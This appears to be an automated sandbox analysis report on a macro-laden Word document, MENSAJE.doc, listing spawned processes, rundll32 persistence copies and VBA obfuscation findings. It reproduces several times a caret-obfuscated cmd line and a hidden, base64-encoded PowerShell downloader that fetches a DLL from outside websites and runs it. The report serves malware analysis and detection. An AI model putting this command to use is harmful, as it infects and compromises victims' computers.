wArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnAC
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',xwmmryHmiBrcQ
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',LiprInkL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',ZlOVOPTFkFCSlH
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',dHWvVgE
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',XiceWXom
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',#1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',xwmmryHmiBrcQ
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',LiprInkL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',ZlOVOPTFkFCSlH
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',dHWvVgE
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',XiceWXom
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2095398011.000000001B840000.00000002.00000001.sdmp
                      Source: MENSAJE.docInitial sample: OLE summary subject = Outdoors, Outdoors & Shoes Personal Loan Account Unbranded one-to-one circuit Generic Fresh Tuna Money Market Account Compatible Roads

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: MENSAJE.docStream path 'Macros/VBA/Uved9u320lyen' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Uved9u320lyen
                      Document contains an embedded VBA with many randomly named variablesShow sources
                      Source: MENSAJE.docStream path 'Macros/VBA/Uved9u320lyen' : High entropy of concatenated variable names
                      Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
                      Source: MENSAJE.docStream path 'Macros/VBA/Uved9u320lyen' : High number of string operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module Uved9u320lyen
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcA
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADA